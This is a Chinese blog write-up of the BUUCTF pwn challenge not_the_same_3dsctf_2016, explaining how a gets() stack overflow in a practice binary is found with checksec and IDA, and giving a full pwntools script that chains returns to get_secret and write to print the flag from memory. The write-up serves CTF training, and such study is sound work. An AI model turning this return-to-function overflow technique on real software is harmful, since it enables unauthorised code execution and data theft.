【BUUCTFPWN】not_the_same_3dsctf_2016

于 2023-01-12 20:29:14 发布
阅读量322 收藏 5
点赞数 2
分类专栏: PWN 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55368674/article/details/128665088
版权

首先使用checksec检查一下文件,没有canary,可以使用栈溢出;有NX保护,栈不可执行。
在这里插入图片描述
使用IDA查看反编译代码,从主函数中可以看到调用了gets函数,存在栈溢出的风险。
使用组合键shift + F12打开字符串窗口,发现第一个字符串就是flag.txt
在这里插入图片描述
双击flag.txt跳转到该字符串在文件中的位置,使用组合键ctrl + x查看用到该字符串的函数。

在这里插入图片描述
进入get_secret函数并进行反编译,可以看到该函数源码如下。
在这里插入图片描述

get_secret函数中调用了C语言库函数fopen()和fgets()。
这两个函数的方法如下:

  1. fgets()函数:
    原型:char *fgets(char *str, int n, FILE *stream)
    作用:从指定的流 stream 读取一行,并把它存储在 str 所指向的字符串内。当读取 (n-1) 个字符时,或者读取到换行符时,或者到达文件末尾时,它会停止,具体视情况而定。
  2. fopen()函数:
    原型:FILE *fopen(const char *filename, const char *mode)
    作用:使用给定的模式 mode 打开 filename 所指向的文件。

明显的,我们可以看到该函数从flag.txt函数中读取了一个长为45的字符串存到fl4g的位置,双击fl4g我们跳转到了它在bss段中的位置。
在这里插入图片描述
整理思路:

  1. 首先该题可以使用栈溢出
  2. 其次该题的flag已经在bss段中,已经在内存中,只需要将其打印出来即可

我们需要找到一种方法将flag从内从中打印出来,要找到可以用来打印的puts函数、write函数,重新查看程序的反编译,程序中找到了write函数。
查看write函数的用法,我们发现write由两种用法,仔细查看反编译的write函数发现它有三个参数,确定了是哪一种write函数。
此处给上write和read函数用法的讲解连接的跳转:write函数的详解与read函数的详解
两种不同write函数的跳转(未核实,不一定正确):write函数的详解与read函数的详解
接下来构造payload如下:

from pwn import *

elf = ELF("./not_the_same_3dsctf_2016")
io = remote('xxx',xxx)

getsecret = elf.sym['get_secret']
print(hex(getsecret))
flagaddr = 0x080ECA2D
write = elf.sym['write']

payload = b'a'*(45)         # 覆盖了栈,没有覆盖ebp,原因是不存在ebp,字符串空间的底部就是函数的返回地址。
payload += p32(getsecret)   # 覆盖返回地址,返回到get_secret函数
payload += p32(write)       # 从get_secret函数返回到write函数
payload += p32(flagaddr)    # 这个是write的返回的值,没什么用,随便填
# 32位汇编的参数传递方式,下面有跳转连接参考。
payload += p32(1)           # write函数的第一个参数,是 文件描述符;
payload += p32(flagaddr)    # write函数的第二个参数,是 存放字符串的内存地址;
payload += p32(42)          # write函数的第三个参数,是 打印字符串的长度
io.send(payload)

io.interactive()

技巧总结

问题1:
为什么不需要覆盖ebp了呢?
答:因为不存在ebp了,我们观察main函数的最后,没有pop ebp语句,取而代之的是一个retn指令,该指令作用就是pop rip,即跳转到返回地址,没有了ebp自然不用覆盖ebp了。
在这里插入图片描述
反汇编的call和retn

问题2:为什么参数的顺序是那样的?
这涉及到了参数传递的方式,本题是32位的程序,使用栈来传递参数,压栈顺序是从右到左,64位程序有64位程序的压栈方式,更为复杂,同时函数声明中也规定了压栈方式,write函数中这个字段就是压栈方式,具体内容可以查阅资料。
在这里插入图片描述

Razors_
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
【CTF】not_the_same_3dsctf_2016
凉水的博客
01-30 3726
解题思路 1 先反编译,找到mian函数 undefined4 main(void) { char local_2d [45]; printf("b0r4 v3r s3 7u 4h o b1ch4o m3m0... "); gets(local_2d); return 0; } 一看到gets,就觉得靠谱了。 2 下一步找可利用函数,构造利用链。随便翻函数列表,没找到system以及/bin/sh,说明没有可以直接获取shell的方法;再继续翻,看到了get_secret函数,以及_
not_the_same_3dsctf_2016 wp (python3)
Kata_Jhin的博客
03-14 138
not_the_same_3dsctf_2016 wp (python3)
BUUCTF-not_the_same_3dsctf_2016
Fzuim的博客
03-03 1557
这是一道pwn题目IDA查看伪代码查看编译属性思路1,本地可打通,远程不行思路2,正确解法答案 IDA查看伪代码 main函数gets函数存在栈溢出攻击 通过查看字符串列表,发现有个get_secret读取flag.txt后门函数 查看编译属性 思路1,本地可打通,远程不行 也是最简单的,payload构造溢出返回到get_secret函数,并printf打印出fl4g,payload如下 #coding=utf8 from pwn import * context.log_level = 'deb
BUUCTF not_the_same_3dsctf_2016
红叶的博客
10-31 180
本题目本地与远程得用两种方案打。
CTF buuoj pwn-----第11题: not_the_same_3dsctf_2016
bing_Max的博客
09-30 1199
前言 bss是指那些没有初始化的和初始化为0的全局变量 bss类型的全局变量只占运行时的内存空间,而不占文件空间。 data类型的全局变量是既占文件空间,又占用运行时内存空间的。 rodata 的意义同样明显,ro代表read only,即只读数据(const) 在运行过程中不会改变的数据设为 rodata 类型的,是有很多好处的:在多个进程间共享,可以大大提高空间利用率,甚至不占用RAM空间。同时由于 rodata 在只读的内存页面(page)中,是受保护的,任何试图对它的修改都会被及
vhe.rar_At the Same Time
09-23
Multi-threaded mode at the same time a number of tasks
find_same_class.zip_Same Same
09-20
找相同类,可以节约很多时间。方便各种类型。
Check_Same_File.rar_Same Same
09-14
简单的比较2个文件是否一样,从类型,文件大小开始比较,最后对比具体内容,可使用文件拖拉出文件名。
MATLAB3.rar_Same Same
09-24
same file contents as the priviously three already uploaded files
The-same-numbers.zip_Same Same
09-24
求s=a+aa+aaa+aaaa的值,其中a是一个数字。例如2+22+222+2222+22222(此时共有5个数相加)。
buuctf|pwn-not_the_same_3dsctf_2016-wp
l2645470582_的博客
11-08 289
1.检查保护机制 我们看到开了堆的保护 2.用32为的IDA打开该文件 shift+f12查看关键字符串,我们看到有‘flag.txt’关键字符 我们就查找出后门函数的地址:0x080489A0 我们看到读取flag.txt,注意fgets函数,就是在f14g里面读取45个字符,我们猜测这就是flag 3.我们查看main函数里面有什么 我们看到gets(&v4)有个溢出,我们看到v4地址是0x2D 4.rop ...
buuctf——not_the_same_3dsctf_2016
qq_41560595的博客
03-26 420
这道题和前面分析过的get_started_3dsctf_2016差不多,换汤不换药。 选择一个地址0x080EB000,用来装shellcode。这个地址要改成可执行的。使用mprotect函数改变。 解题代码: from pwn import * #p=process("./not") p=remote("node3.buuoj.cn",29607) elf=ELF("./not") read=elf.symbols["read"] mprotect=elf.symbols["mprotect"] m
not_the_same_3dsctf_2016的wp
wuyvle的博客
02-06 194
32位程序 看看函数主题 32位ida载入,shift+f12查看程序里的字符串,发现flag.txt 双击跟进,ctrl+x找到调用这个字符串的函数,可以看到,这个函数将flag读了出来,存放到了unk_80F91B的位置,我们要想办法将这个地址上的内容读出来读出 根据nc看到的字符串,找到输入点,gets可以造成溢出 我一开始的思路是利用main函数里的gets造成溢出,覆盖返回地址去读出flag,然后利用get_secret函数的输入点造成溢出然后覆盖返回地址到write函数的地址,打印出un
BUU PWN(一)
playmaker的博客
01-28 2068
test_your_nc 连上即可拿到shell rip from pwn import * context.log_level='debug' #p=process('./17pwn1') p=remote("node3.buuoj.cn","26137") p.recvuntil("please input\n") payload='a'*0xf+'a'*8+p64(0x401186) p.s...
[PWN] BUUCTF not_the_same_3dsctf_2016的三种做法
空城惜梦的博客
06-03 317
[PWN] BUUCTF not_the_same_3dsctf_2016的三种做法1.维持函数正常结束(printf打印)payload1(FALSE)payload2(TRUE)2.write打印payload3.修改栈区权限存在疑惑参考wp 按照惯例先checksec一下,发现没有canary和pie 之后用ida查看主要函数main有个gets函数存在栈溢出 函数窗口中有个backdoor函数get_secret,因为这个函数可以读取flag.txt并且通过v0将内容写进fl4g,所以可以想到在
[PWN] BUUCTF not_the_same_3dsctf_2016 1 Writeup
Csome
05-21 517
解题 checksec 先checksec一下,发现没有开canary方便了栈溢出,PIE也没开 反编译 IDA反编译 main函数 get_secret函数 分析利用 程序先进入main函数,有一个gets(无限长度的栈溢出) get_secret函数是将flag.txt读入bss段中,并没有做输出的操作 思路:,在main函数中修改main函数的返回地址,返回到get_secret函数中,读取flag,再返回到mian函数中(第二次进入main函数),修改返回地址为printf的地址,传入flag
write_name_nets_same_as_ports
最新发布
07-28
在综合设计时,可以使用write_name_nets_same_as_ports命令来将网名与端口名保持一致。这个命令的作用是在生成的网表文件中,将每个信号的名称与其对应的端口名称相同。这样做的好处是可以提高设计的可读性和可维护性,方便后续的布局布线和时序分析工作。使用这个命令可以确保在综合后的网表文件中,每个信号的名称都与其对应的端口名称一致。这样在后续的设计流程中,可以更方便地进行信号的追踪和分析。\[1\] #### 引用[.reference_title] - *1* *3* [DC综合——学习笔记](https://blog.csdn.net/zgezi/article/details/107830443)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [数字电路设计入门(fpga/asic)](https://blog.csdn.net/Augusdi/article/details/105150815)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值